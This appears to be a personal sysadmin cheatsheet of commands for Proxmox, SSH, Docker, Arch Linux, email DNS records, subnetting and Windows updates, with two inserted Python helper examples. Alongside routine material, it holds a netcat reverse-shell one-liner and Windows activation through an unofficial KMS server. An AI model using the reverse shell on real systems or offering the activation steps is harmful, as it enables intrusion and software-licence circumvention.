CK Cheatsheet

See list of certs before renewing

UniFi

Adopt Devices

CKEL controller:

set-inform https://unifi.cktechx.com:8080/inform 

set-inform http://unifi.cktechx.com:8080/inform 

Resolve Controller:

set-inform https://unifi.resolvetech.biz:8080/inform

If you get an Unknown[12] error, run this instead:

set-inform http://unifi.resolvetech.biz:8080/inform

Or by IP (20.246.74.195):

set-inform http://20.246.74.195:8080/inform

CertBot

sudo systemctl stop nginx

sudo certbot certonly --standalone -d unifi.cktech.org

sudo nano /etc/nginx/sites-available/unifi

sudo certbot certonly --standalone -d unifi.yourdomain.com

sudo certbot certonly --standalone -d unifi.cktech.o

Proxmox

Resize Container

pct resize <CTID> rootfs +10G

Proxmox V8

pve7to8 --full

Re-generate Self-Signed Certificates

Node will either be pve or galaxy

rm /etc/pve/pve-root-ca.pem

rm /etc/pve/priv/pve-root-ca.key

rm /etc/pve/nodes/<node>/pve-ssl.pem

rm /etc/pve/nodes/<node>/pve-ssl.key

After removal run the following command and reboot:

pvecm updatecerts -f

Proxmox VE v9 Upgrade

# 1. Pre-flight check

pve8to9 --full

# 2. Switch APT sources to Trixie + PVE 9 (no-subscription)

sed -i 's/bookworm/trixie/g' /etc/apt/sources.list

sed -i 's/bookworm/trixie/g' /etc/apt/sources.list.d/pve-enterprise.list 2>/dev/null || true

echo "deb http://download.proxmox.com/debian/pve trixie pve-no-subscription" > /etc/apt/sources.list.d/pve-no-sub.list

# Optional: Ceph sources (if you run Ceph, replace quincy with reef)

# echo "deb http://download.proxmox.com/debian/ceph-quincy trixie no-subscription" > /etc/apt/sources.list.d/ceph.list

# 3. Update + upgrade

apt update && apt full-upgrade -y

# 4. Reboot into Proxmox VE 9

reboot

macOS OSK Key for virtual machine use:

ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc

Windows KMS Activation

KMS Keys

Windows 10/11 Pro

W269N-WFGWX-YVC9B-4J6C9-T83GX

Windows Server 2022 Standard

VDYBN-27WPP-V4HQT-9VMD4-VMK7H

Activation

Windows 11

Slmgr /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX

Slmgr /skms kms8.msguides.com

slmgr /ato

Win Server 2022

 DISM /online /Set-Edition:ServerStandard /ProductKey:VDYBN-27WPP-V4HQT-9VMD4-VMK7H /AcceptEula

Slmgr /ipk VDYBN-27WPP-V4HQT-9VMD4-VMK7H

Slmgr /skms kms8.msguides.com

slmgr /ato

Windows Server 2025 Standard        TVRH6-WHNXV-R9WG3-9XRFY-MY832

Windows Server 2025 Datacenter        D764K-2NDRG-47T6Q-P8T8W-YP6DF

Windows Server 2025 Datacenter: Azure Edition        XGN3F-F394H-FD2MY-PP6FD-8MCRC

Windows Server 2025

 DISM /online /Set-Edition:ServerStandard /ProductKey:TVRH6-WHNXV-R9WG3-9XRFY-MY832 /AcceptEula

Slmgr /ipk TVRH6-WHNXV-R9WG3-9XRFY-MY832

Slmgr /skms kms8.msguides.com

slmgr /ato

Re-arm 180 Days

slmgr -rearm

Pull Licensing info via CLI

This command displays the license information for the Windows installation in a pop-up window:

slmgr.vbs /dli

Get Additional Details

slmgr.vbs /dlv

Pull Windows License

(Get-WmiObject -query 'select * from SoftwareLicensingService').OA3xOriginalProductKey

Get Activation Status

slmgr /xpr

Linux: Append a line to a file in every subdirectory

# Adds CLAUDE.md to the .gitignore of every project under /data/projects,
# creating the file when it is missing and skipping projects that already list it.
for d in /data/projects/*/; do
  [ -d "$d" ] || continue
  if [ -f "$d/.gitignore" ]; then
    grep -qxF "CLAUDE.md" "$d/.gitignore" || echo "CLAUDE.md" >> "$d/.gitignore"
  else
    echo "CLAUDE.md" > "$d/.gitignore"
  fi
done

Linux Distro & Version via CLI

lsb_release -d

Linux Unattended Upgrades

apt install unattended-upgrades

dpkg-reconfigure --priority=low unattended-upgrades

 

Device Uptime (Linux)

uptime -p

Network Settings

ip a

Old Net Settings

ifconfig

Install Screen Connect

sudo dpkg -i ConnectWiseControl.ClientSetup.deb

display the value of the PATH variable

echo $PATH


Search manual

searches manual page names and descriptions for "which"

man -k which

SSH Setup

sudo apt update && sudo apt upgrade

sudo apt install openssh-client

sudo apt install openssh-server

sudo systemctl status ssh

sudo ufw allow ssh

Enable Root Login (SSH)

nano /etc/ssh/sshd_config

PermitRootLogin yes


Can also enable PubkeyAuthentication and set PasswordAuthentication no when using SSH key-based authentication; once keys are in place, PermitRootLogin prohibit-password keeps root reachable by key only.

Install SSH Server

sudo apt install openssh-server

sudo systemctl status ssh

SSH Hardening

sudo vim /etc/ssh/sshd_config

Uncomment the Port 22 line and change it to another port below 1024 (e.g. 888). On Ubuntu releases where ssh is socket-activated (22.10 and later), also update the ListenStream port in ssh.socket (or disable ssh.socket), otherwise the new Port is not used.

Insert mode (i) → 22 → 888

ESC (command mode)

:wq

sudo systemctl restart sshd

SSH Key Authentication

ssh-keygen -t ed25519

ssh-keygen -t rsa

mkdir ~/.ssh && chmod 700 ~/.ssh

Linux Copy key to authorized_keys

ssh-copy-id root@10.3.0.10

Windows (note: this replaces any existing authorized_keys on the target):

scp $env:USERPROFILE/.ssh/id_ed25519.pub chris@10.3.6.9:~/.ssh/authorized_keys

Alternatively, create a new keychain in Termius and copy the key to the authorized_keys file. Do NOT save the passphrase in Termius; store it in Bitwarden.

Restart SSH

sudo systemctl restart sshd


Kali Updates

sudo apt update && sudo apt full-upgrade -y

Uncomplicated Firewall (UFW)  Setup

sudo apt install ufw

sudo ufw status

sudo ufw allow 888

sudo ufw enable

sudo ufw allow 'Apache'

sudo ufw allow 'Apache Full'

sudo ufw allow Nginx

sudo ufw status numbered

sudo ufw delete 1   # example: rule number taken from 'ufw status numbered'

Ubuntu Package Manager issue (21.10)

sudo apt-get install -f

popOS Updates

sudo apt update

sudo apt full-upgrade

Linux Redirection

cat 1> output.txt    # redirect stdout (fd 1) to output.txt

cat > output1.txt    # write stdin to output1.txt (Ctrl-D to finish)

nmap -sS domain.com

-sV (service version)

Reverse Shell

nc -lnvp 87 -s 10.1.1.1   # listen on IP 10.1.1.1, port 87

nc -e /bin/bash 10.1.1.1 87

PSEXEC

TBD…

Bash Scripts

chmod +x script.sh

./script.sh

Docker

Cheatsheet

https://github.com/ChristianLempa/cheat-sheets/blob/main/tools/docker.md 

Install

sudo apt update && sudo apt upgrade -y

sudo apt install -y apt-transport-https ca-certificates curl software-properties-common

curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg

echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null

sudo apt update

sudo apt install -y docker-ce docker-ce-cli containerd.io

docker --version

View active instances

docker ps

Create Volume

sudo docker volume create vname

Remote into container

docker exec -it acmesh-acme.sh-1 /bin/sh

docker exec -it acmesh-acme.sh-1 bash

Docker Compose

Installation

sudo curl -L "https://github.com/docker/compose/releases/latest/download/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose

sudo chmod +x /usr/local/bin/docker-compose

docker-compose --version

Portainer 

Docker Management


Installation

# Create portainer Volume

sudo docker volume create portainer_data

# Pull the latest EE version (or skip to the next step and use -ce instead for Community Edition)

sudo docker pull portainer/portainer-ee:latest

sudo docker run -d -p 9443:9443 -p 8000:8000 --name portainer --restart always -v /var/run/docker.sock:/var/run/docker.sock -v /srv/portainer:/data portainer/portainer-ee:latest


=== OPT ===
sudo docker run -d -p 9443:9443 -p 8000:8000 --name portainer --restart always -v /var/run/docker.sock:/var/run/docker.sock -v /srv/portainer:/data portainer/portainer-ee

=== OPT ===

docker run -d \

  -p 9001:9001 \

  --name portainer_agent \

  --restart=always \

  -v /var/run/docker.sock:/var/run/docker.sock \

  -v /var/lib/docker/volumes:/var/lib/docker/volumes \

  -v /:/host \

  portainer/agent:2.21.5

OLD Portainer Deployment

docker volume create portainer_data

sudo docker run -d -p 9443:9443 -p 8000:8000 --name portainer --restart always -v /var/run/docker.sock:/var/run/docker.sock -v /srv/portainer:/data portainer/portainer-ee:latest

Upgrade portainer

docker stop portainer

docker rm portainer

docker pull portainer/portainer-ce:latest

docker run -d -p 9443:9443 -p 8000:8000 --name=portainer --restart=always -v /var/run/docker.sock:/var/run/docker.sock -v portainer_data:/data portainer/portainer-ce:latest

sudo apt-get update

sudo apt-get install certbot python3-certbot-nginx

sudo certbot --nginx -d cktech.org

sudo docker pull portainer/portainer-ce

sudo docker volume create portainer_data

sudo docker run -d -p 9443:9443 -p 8000:8000 --name portainer --restart always -v /var/run/docker.sock:/var/run/docker.sock -v /srv/portainer:/data portainer/portainer-ce:latest

WINGET

Update Packages

winget update --all

Include unknown

 winget update --all --include-unknown

Other:

winget upgrade --all --accept-package-agreements

Notes

https://learn.microsoft.com/en-us/windows/package-manager/winget/ 

https://github.com/microsoft/winget-cli

winget search appname

winget install appname (or the app id; names containing spaces need quotes, e.g. "Github Desktop")

winget upgrade appname

# Command to update all applications

winget upgrade --all

winget install -e --id tailscale.tailscale

Winget ships with Windows now, but I had issues running it via PowerShell on a few of my computers. Not sure what's changed, but I can't just run winget upgrade --all in PowerShell. A potential workaround is to add the path to winget and run it in Command Prompt.

Add Winget to PATH

C:\Users\chris\AppData\Local\Microsoft\WindowsApps\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe

Add App Package to Powershell

Add-AppxPackage -RegisterByFamilyName -MainPackage Microsoft.DesktopAppInstaller_8wekyb3d8bbwe

Screen connect Testing

#timeout=1000000

"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.19.11071.0_x64__8wekyb3d8bbwe\winget.exe" upgrade --all --accept-source-agreements

"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.19.11071.0_x64__8wekyb3d8bbwe\winget.exe" search "Google Chrome" --accept-source-agreements

find which version of DesktopAppInstaller is installed

dir "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller*"

Working, to update all packages

#timeout=1000000

#maxlength=1000000

"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.19.11071.0_x64__8wekyb3d8bbwe\winget.exe" upgrade --all --include-unknown --silent --accept-source-agreements

"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.19.11071.0_x64__8wekyb3d8bbwe\winget.exe" upgrade --name "Google Chrome" --silent --accept-source-agreements

"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.19.11071.0_x64__8wekyb3d8bbwe\winget.exe" show "Google Chrome" --accept-source-agreements

KASM

Initial Setup (Ubuntu Server)

sudo dd if=/dev/zero bs=1M count=1024 of=/mnt/1GiB.swap

sudo chmod 600 /mnt/1GiB.swap

sudo mkswap /mnt/1GiB.swap

sudo swapon /mnt/1GiB.swap

Verify Swap

cat /proc/swaps

make sure swap comes back after a reboot

adds the entry to /etc/fstab

echo '/mnt/1GiB.swap swap swap defaults 0 0' | sudo tee -a /etc/fstab

Installation

wget https://kasm-static-content.s3.amazonaws.com/kasm_release_1.16.0.f2d6e1.tar.gz

extract the archive

tar -xf kasm_release*.tar.gz

run the installation script

sudo bash kasm_release/install.sh

Certbot setup Legacy

apt install certbot -y

certbot certonly --standalone -d kasm.cktech.org

Replace SELF_SIGNED Certs:

sudo /opt/kasm/bin/stop

cp /etc/letsencrypt/live/kasm.cktech.org/fullchain.pem /opt/kasm/current/certs/kasm_nginx.crt

cp /etc/letsencrypt/live/kasm.cktech.org/privkey.pem /opt/kasm/current/certs/kasm_nginx.key

sudo /opt/kasm/bin/start

Setup Cron Job for renewal


OTHER

sudo certbot renew --force-renewal -d kasm.cktech.org

sudo certbot certificates

sudo certbot renew

Google Email Security

DKIM

https://apps.google.com/supportwidget/articlehome?article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F174124&product_context=174124&product_name=UnuFlow&trigger_context=a 

SPF Record

TXT record

Host: @

Value: v=spf1 include:_spf.google.com ~all

TTL: 1 Hour or 3600 seconds

DMARC Record

Start

Add a DNS TXT record for _dmarc
TXT Record name _dmarc.cktech.org (Some DNS providers automatically add the domain to the end)

TXT Record Value:

v=DMARC1; p=none; rua=mailto:reports@cktech.org

Phase 2 (quarantine a small percentage):

v=DMARC1; p=quarantine; pct=5; rua=mailto:reports@cktech.org

Phase 3 (reject):

v=DMARC1; p=reject; rua=mailto:reports@cktech.org;

Phase 4 (reject with strict DKIM and SPF alignment):

v=DMARC1; p=reject; rua=mailto:reports@cktech.org; adkim=s; aspf=s;

Final (reject, strict alignment, aggregate reports to two addresses):

v=DMARC1; p=reject; rua=mailto:postmaster@cktech.org, mailto:reports@cktech.org; pct=100; adkim=s; aspf=s

Microsoft365 Email Security

You can go to Admin Center and go to Settings → Domains and review Domain DNS records and or a health check.

https://www.namecheap.com/support/knowledgebase/article.aspx/9666/2208/setting-up-microsoft-365-with-a-namecheap-domain/ 

https://lazyadmin.nl/office-365/configure-dkim-office-365/ 

SPF Record

TXT Record

Name: @

Value: v=spf1 include:spf.protection.outlook.com -all

DKIM

https://lazyadmin.nl/office-365/configure-dkim-office-365/ 

Host Name : selector1._domainkey

Points to address or value: selector1-cktechnology-org._domainkey.crktechnology.onmicrosoft.com

Host Name : selector2._domainkey

Points to address or value: selector2-cktechnology-org._domainkey.crktechnology.onmicrosoft.com

M365 DKIM Test & Check

https://admin.microsoft.com/AdminPortal/?searchSolutions=DKIM#/homepage 

DMARC

https://lazyadmin.nl/office-365/office-365-dmarc/ 

Starter less restrictive:

v=DMARC1; p=none; rua=mailto:dmarc@cktechnology.org

TXT RECORD:

Host: _dmarc

value: v=DMARC1; p=reject; rua=mailto:dmarc@cktechnology.org; ruf=mailto:dmarc@cktechnology.org; pct=100; adkim=s; aspf=s
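Added example (not part of these notes), covering both the Google and Microsoft 365 records above: a small Python checker that parses a DMARC TXT record, flags the usual mistakes, names the rollout phase a record represents, and reports the failure mode of an SPF record's trailing all mechanism. The sample records are the ones shown in this cheatsheet.

```python
# DMARC / SPF record checker (added example; not from the original notes).
# The sample records below are the ones shown in this cheatsheet.

SAMPLE_DMARC = {
    "monitor": "v=DMARC1; p=none; rua=mailto:reports@cktech.org",
    "partial": "v=DMARC1; p=quarantine; pct=5; rua=mailto:reports@cktech.org",
    "strict": ("v=DMARC1; p=reject; rua=mailto:postmaster@cktech.org, "
               "mailto:reports@cktech.org; pct=100; adkim=s; aspf=s"),
}
SAMPLE_SPF = {
    "google": "v=spf1 include:_spf.google.com ~all",
    "m365": "v=spf1 include:spf.protection.outlook.com -all",
}

VALID_POLICIES = {"none", "quarantine", "reject"}
SPF_QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def parse_dmarc(record):
    """Split a DMARC TXT record into a {tag: value} dict (tag=value pairs separated by ';')."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue  # tolerate a trailing ';'
        if "=" not in part:
            raise ValueError("malformed DMARC tag: %r" % part)
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    return tags


def check_dmarc(record):
    """Return a list of problems with the record; an empty list means it looks sound."""
    problems = []
    tags = parse_dmarc(record)
    if not record.strip().lower().startswith("v=dmarc1"):
        problems.append("record must start with v=DMARC1 or receivers ignore it")
    policy = tags.get("p")
    if policy not in VALID_POLICIES:
        problems.append("p tag missing or invalid: %r" % policy)
    pct = tags.get("pct", "100")
    if not pct.isdigit() or not 0 <= int(pct) <= 100:
        problems.append("pct must be an integer 0-100, got %r" % pct)
    elif policy == "none" and int(pct) != 100:
        problems.append("pct has no effect while p=none")
    if "rua" not in tags:
        problems.append("no rua address: no aggregate reports will be delivered")
    for tag in ("rua", "ruf"):
        for uri in tags.get(tag, "").split(","):
            uri = uri.strip()
            if uri and not uri.lower().startswith("mailto:"):
                problems.append("%s URI must be a mailto: address, got %r" % (tag, uri))
    for tag in ("adkim", "aspf"):
        if tags.get(tag, "r") not in ("r", "s"):
            problems.append("%s must be r (relaxed) or s (strict)" % tag)
    return problems


def rollout_phase(record):
    """Name the rollout stage a record represents: monitor, partial, enforce or strict."""
    tags = parse_dmarc(record)
    policy = tags.get("p")
    pct = int(tags.get("pct", "100"))
    aligned = tags.get("adkim") == "s" and tags.get("aspf") == "s"
    if policy == "none":
        return "monitor"
    if pct < 100:
        return "partial"
    if policy == "reject" and aligned:
        return "strict"
    return "enforce"


def spf_all_mode(record):
    """Return how the SPF record treats senders that match no mechanism (the trailing 'all')."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    for term in terms[1:]:
        qualifier = term[0] if term[0] in SPF_QUALIFIERS else "+"
        if term.lstrip("+-~?").lower() == "all":
            return SPF_QUALIFIERS[qualifier]
    return "neutral"  # RFC 7208 default when no 'all' term is present


if __name__ == "__main__":
    for name, rec in SAMPLE_DMARC.items():
        print(name, rollout_phase(rec), check_dmarc(rec) or "ok")
    for name, rec in SAMPLE_SPF.items():
        print(name, spf_all_mode(rec))
```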

Pihole 

curl -sSL https://install.pi-hole.net | bash

echo "deb https://packages.pi-hole.net/ubuntu $(lsb_release -sc) main" | sudo tee /etc/apt/sources.list.d/pihole.list

curl -sSL https://raw.githubusercontent.com/pi-hole/pi-hole/master/automated%20install/basic-install.sh | sudo bash

Update

pihole -up

Update Gravity

pihole -g

Change password

sudo pihole -a -p

Update

sudo apt-get upgrade pihole

sudo systemctl restart pihole-FTL.service

QEMU

sudo apt install -y qemu qemu-kvm libvirt-daemon libvirt-clients bridge-utils virt-manager

sudo systemctl status libvirtd

Arch Linux

Reload initramfs

sudo mkinitcpio -P

Fix Mirror List

# Refresh Chaotic AUR mirrors if you're getting 404 or connection errors

sudo pacman -Sy chaotic-mirrorlist

sudo pacman -Syyu  # Full system refresh using updated mirror

Snapper

Install

sudo pacman -S snapper snap-pac

sudo btrfs subvolume create /.snapshots

sudo chmod 750 /.snapshots

sudo chown :wheel /.snapshots

sudo blkid | grep nvme0n1p2   # get the UUID of the root filesystem

# add to /etc/fstab using that UUID:
UUID=your-root-uuid  /.snapshots  btrfs  subvol=@.snapshots,noatime,compress=zstd:3  0 0

sudo mount /.snapshots

sudo snapper -c root create --description "Initial root snapshot"

sudo snapper -c root list

sudo snapper -c home create-config /home

sudo chmod 750 /home/.snapshots

sudo chown :wheel /home/.snapshots

sudo snapper -c home create --description "initial home snapshot"

sudo snapper -c home list

sudo systemctl enable --now snapper-timeline.timer

sudo systemctl enable --now snapper-cleanup.timer

Update b2 sums (pkgbuild)

updpkgsums

Check Nvidia Logs

journalctl -b0 --grep="nvidia" --no-pager

Additional Setup

sudo nano /etc/pacman.conf

Uncomment Color and ParallelDownloads

Add ILoveCandy below them

sudo pacman -Sy

sudo pacman -S cargo

sudo pacman -S reflector

sudo cp /etc/pacman.d/mirrorlist /etc/pacman.d/mirrorlist.bak

sudo reflector --verbose --latest 10 --protocol https --sort rate --save /etc/pacman.d/mirrorlist

pacman -Syu

pacman -S nano vim neofetch

KDE Wayland

pacman -Sy xorg plasma kde-applications plasma-wayland-session

Wayland Session KDE (NVIDIA)

sudo pacman -Sy xorg plasma kde-applications plasma-wayland-session

X11 session

pacman -Sy xorg plasma kde-applications sddm

Install AUR 

sudo pacman -S --needed base-devel

sudo pacman -S git

git clone https://aur.archlinux.org/yay.git

cd yay

makepkg -si

to install a package using yay

yay -S package

Gnome shell

yay -S chrome-gnome-shell

Google chrome

yay -S google-chrome

remove package

yay -Rns package

Update system packages

yay -Syy

Perform a full upgrade

yay -Syu

View more options

man yay

Gnome42 arch

pacman -Sy gnome gnome-extra

 sudo pacman -S flatpak

sudo pacman -S kaccounts-providers

sudo pacman -S kio-gdrive

KDE Reset Configuration

rm ~/.config/plasma-org.kde.plasma.desktop-appletsrc

rm ~/.config/plasmashellrc

rm ~/.config/plasmarc

Install Visual Studio Code

sudo pacman -S --needed git base-devel

git clone https://aur.archlinux.org/visual-studio-code-bin.git

cd visual-studio-code-bin

makepkg -si

Method 2

yay -S visual-studio-code-bin

makepkg builds the package yourself from the PKGBUILD; pacman -S installs a prebuilt package from the repositories:

sudo pacman -S vim

sudo pacman -Sy vim   # refreshes the package database first; prefer -Syu to avoid a partial upgrade

 

Unzip Files

Arch Based

tar xvf linux-5.18-rc3.tar.gz

sudo pacman -Syu

sudo pacman -Syyu

sudo pacman -S git

git clone https://aur.archlinux.org/yay-git.git

sudo pacman -S --needed base-devel git

yay -S google-chrome

sudo pacman -S google-chrome

sudo pacman -S steam

sudo pacman -S discord

sudo pacman -S snapd

sudo systemctl enable --now snapd.socket

sudo snap install signal-desktop

sudo snap install youtube-music-desktop-app

Manjaro switch branch

sudo pacman-mirrors --api --set-branch unstable

sudo mhwd-kernel --list

sudo mhwd-kernel --install linux518

Manjaro Automatic Installation Nvidia Driver Manjaro Repository

sudo mhwd -a pci nonfree 0300

Further configure settings

nvidia-settings

Fedora  

Update

sudo dnf upgrade

Print System info

uname -mrs

reboot

sudo reboot

sudo shutdown -r now

Pop! OS

Wayland

sudo vim /etc/gdm3/custom.conf

# set (or uncomment) under [daemon]:
WaylandEnable=true

ESC

:wq

systemctl restart gdm3

Session Type

echo $XDG_SESSION_TYPE

popOS tweak Applications menu

cd /usr/share/gnome-shell/extensions/pop-cosmic@system76.com

sudo vim dark.css

/* Nord colors */
.cosmic-applications-dialog {
    background-color: #252631;
}

/* alternate: #1B1B1B */

TimeShift

Arch Based

sudo pacman -S git

sudo pacman -Syu

git clone https://aur.archlinux.org/timeshift.git

cd timeshift

makepkg -si

Timeshift via AUR

yay -S timeshift

Debian Setup

sudo add-apt-repository -y ppa:teejee2008/ppa

sudo apt-get update

sudo apt-get install timeshift

Backblaze B2


Wasabi Bucket


Subnet CheatSheet

CIDR  SUBNET MASK      WILDCARD MASK    # OF IP ADDRESSES  # OF USABLE IP ADDRESSES
/32   255.255.255.255  0.0.0.0                          1                         1
/31   255.255.255.254  0.0.0.1                          2                        2*
/30   255.255.255.252  0.0.0.3                          4                         2
/29   255.255.255.248  0.0.0.7                          8                         6
/28   255.255.255.240  0.0.0.15                        16                        14
/27   255.255.255.224  0.0.0.31                        32                        30
/26   255.255.255.192  0.0.0.63                        64                        62
/25   255.255.255.128  0.0.0.127                      128                       126
/24   255.255.255.0    0.0.0.255                      256                       254
/23   255.255.254.0    0.0.1.255                      512                       510
/22   255.255.252.0    0.0.3.255                    1,024                     1,022
/21   255.255.248.0    0.0.7.255                    2,048                     2,046
/20   255.255.240.0    0.0.15.255                   4,096                     4,094
/19   255.255.224.0    0.0.31.255                   8,192                     8,190
/18   255.255.192.0    0.0.63.255                  16,384                    16,382
/17   255.255.128.0    0.0.127.255                 32,768                    32,766
/16   255.255.0.0      0.0.255.255                 65,536                    65,534
/15   255.254.0.0      0.1.255.255                131,072                   131,070
/14   255.252.0.0      0.3.255.255                262,144                   262,142
/13   255.248.0.0      0.7.255.255                524,288                   524,286
/12   255.240.0.0      0.15.255.255             1,048,576                 1,048,574
/11   255.224.0.0      0.31.255.255             2,097,152                 2,097,150
/10   255.192.0.0      0.63.255.255             4,194,304                 4,194,302
/9    255.128.0.0      0.127.255.255            8,388,608                 8,388,606
/8    255.0.0.0        0.255.255.255           16,777,216                16,777,214
/7    254.0.0.0        1.255.255.255           33,554,432                33,554,430
/6    252.0.0.0        3.255.255.255           67,108,864                67,108,862
/5    248.0.0.0        7.255.255.255          134,217,728               134,217,726
/4    240.0.0.0        15.255.255.255         268,435,456               268,435,454
/3    224.0.0.0        31.255.255.255         536,870,912               536,870,910
/2    192.0.0.0        63.255.255.255       1,073,741,824             1,073,741,822
/1    128.0.0.0        127.255.255.255      2,147,483,648             2,147,483,646
/0    0.0.0.0          255.255.255.255      4,294,967,296             4,294,967,294

* /31 is a point-to-point link (RFC 3021): no network or broadcast address is reserved, so both addresses are usable.
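Added example (not from the original cheatsheet): a Python calculator that derives every row of the table above from the prefix length alone, including the /31 and /32 special cases, plus two helpers for the questions the table is usually consulted for: the usable host range of a concrete network and whether an address falls inside a range. The networks in the usage lines are constructed sample values.

```python
import ipaddress

# IPv4 subnet calculator (added example; not from the original cheatsheet).
# Networks used in the usage section below are constructed sample values.


def subnet_row(prefix):
    """Mask, wildcard mask, address count and usable host count for an IPv4 /prefix."""
    if not 0 <= prefix <= 32:
        raise ValueError("invalid IPv4 prefix length: %r" % prefix)
    net = ipaddress.IPv4Network("0.0.0.0/%d" % prefix)
    total = net.num_addresses
    if prefix == 32:
        usable = 1            # single host route
    elif prefix == 31:
        usable = 2            # RFC 3021 point-to-point: nothing reserved
    else:
        usable = total - 2    # minus the network and broadcast addresses
    return {
        "cidr": "/%d" % prefix,
        "mask": str(net.netmask),
        "wildcard": str(net.hostmask),
        "total": total,
        "usable": usable,
    }


def usable_range(cidr):
    """First and last usable host of a network, honouring the /31 and /32 special cases."""
    net = ipaddress.IPv4Network(cidr, strict=False)
    first, last = int(net.network_address), int(net.broadcast_address)
    if net.prefixlen < 31:
        first += 1
        last -= 1
    return str(ipaddress.IPv4Address(first)), str(ipaddress.IPv4Address(last))


def contains_host(cidr, host):
    """True if host falls inside cidr (e.g. checking a firewall rule or a named-location range)."""
    return ipaddress.IPv4Address(host) in ipaddress.IPv4Network(cidr, strict=False)


def build_table():
    """All rows from /32 down to /0, in the same order as the table above."""
    return [subnet_row(p) for p in range(32, -1, -1)]


if __name__ == "__main__":
    fmt = "%-5s %-16s %-16s %14s %14s"
    print(fmt % ("CIDR", "SUBNET MASK", "WILDCARD MASK", "# IPs", "# USABLE"))
    for row in build_table():
        print(fmt % (row["cidr"], row["mask"], row["wildcard"],
                     "{:,}".format(row["total"]), "{:,}".format(row["usable"])))
    print(usable_range("10.3.0.0/24"), contains_host("10.3.0.0/24", "10.3.0.10"))
```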

Power Options

View Power Options in CLI  

powercfg /getactivescheme

Set High Performance Powerplan CLI

powercfg.exe /setactive 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c

Disable Network Adapter

netsh interface set interface "YOUR-ADAPTER-NAME" disable

NETSH Commands

Runs a report

netsh wlan show wlanreport

Show Wifi Settings etc.

netsh wlan show interfaces

Resolvetech Maintenance

Scheduled defender scans

Run via Screen Connect Terminal

#!ps

Set-MpPreference -ScanParameters 2   # 2 = full scan (1 = quick scan)

#!ps

Set-MpPreference -RemediationScheduleDay 4   # 4 = Wednesday (0 = every day, 1 = Sunday ... 7 = Saturday, 8 = never)

#!ps

Set-MpPreference -RemediationScheduleTime 21:00:00

#!ps

Get-MpComputerStatus

Update Portainer Agents on Linux Servers

sudo docker stop portainer_agent && sudo docker rm portainer_agent && sudo docker pull portainer/agent:latest && sudo docker run -d -p 9001:9001 --name portainer_agent --restart=always -v /var/run/docker.sock:/var/run/docker.sock -v /var/lib/docker/volumes:/var/lib/docker/volumes portainer/agent:latest

Windows Updates

Screen Connect Method

Reboot

#!ps

#timeout=1000000

Get-WindowsUpdate -install -acceptall -autoreboot

No Reboot

#!ps

#timeout=1000000

Get-WindowsUpdate -install -acceptall -IgnoreReboot

#3 hours

shutdown /r /t 10800

#6 hours

shutdown /r /t 21600

Backstage via Powershell

With Restart

Set-ExecutionPolicy Unrestricted

Get-WindowsUpdate -install -acceptall -autoreboot

#do after restart

Set-ExecutionPolicy Restricted

Without Restart

Set-ExecutionPolicy Unrestricted

Get-WindowsUpdate -install -acceptall

Set-ExecutionPolicy Restricted

Command Prompt Backstage

Regular Updates

Powershell.exe -EP Unrestricted "iwr 'https://raw.githubusercontent.com/ResoTech/public-misc/main/UpdateWindows.ps1' -o winup.ps1; .\winup.ps1"

No Reboot

Powershell.exe -EP Unrestricted "iwr 'https://raw.githubusercontent.com/ResoTech/public-misc/main/UpdateNoReboot' -o winupNoRe.ps1; .\winupNoRe.ps1"

Update to 22H2 Silently

Powershell.exe -EP Unrestricted "iwr 'https://raw.githubusercontent.com/ResoTech/public-misc/main/Silent22H2.ps1' -o winup22h2.ps1; .\winup22h2.ps1"

Unsupported hardware Upgrade to Win11

Switch to the mounted ISO drive (D: or E:), then:

cd sources

setupprep.exe /product server

CLI Restart

shutdown -r -f -t 0

Query Logged in window users

query user

Powershell

Windows Updates


Restarts (Warning can prompt users)

#3 hours

shutdown /r /t 10800

#6 hours

shutdown /r /t 21600

Install

  1. In PowerShell: Set-ExecutionPolicy -ExecutionPolicy Unrestricted
  2. Install-Module PSWindowsUpdate (or Import-Module PSWindowsUpdate if it is already installed)

Screenconnect:

#!ps

#timeout=1000000

Get-WindowsUpdate -install -acceptall -autoreboot

Additional

$HideList = "KB5005565", "KB5005566"

Get-WindowsUpdate -KBArticleID $HideList -Hide

Uninstall Updates:

Remove-WindowsUpdate -KBArticleID KB5005565 -NoRestart

wusa /uninstall /kb:5005565

Unhide it:

Get-WindowsUpdate -KBArticleID $HideList -WithHidden -Hide:$false

Get-WindowsUpdate -KBArticleID KB5005565 -WithHidden -Hide:$false

Install updates

Get-WindowsUpdate -install -acceptall -autoreboot

Install Updates no Restart

Get-WindowsUpdate -install -acceptall

Get-WindowsUpdate -IsHidden

Remove-WindowsUpdate -KBArticleID KB5005565 -NoRestart

Optional: install individual patch

Get-WindowsUpdate -KBArticleID KB890830 -install

Get-WindowsUpdate -KBArticleID KB5005565 -install

ScreenConnect Command

#!ps

#timeout=1000000

Get-WindowsUpdate -install -acceptall -autoreboot

Windows Updates Script

===========================================

# Set execution policy to unrestricted
Set-ExecutionPolicy -ExecutionPolicy Unrestricted

# Install the PSWindowsUpdate module
Install-Module -Name PSWindowsUpdate

# Import the module
Import-Module -Name PSWindowsUpdate

# Check for updates (list only; Get-WUInstall would already start installing here)
$Updates = Get-WindowsUpdate

# Install updates
if ($Updates) {
    Write-Output "Installing updates..."
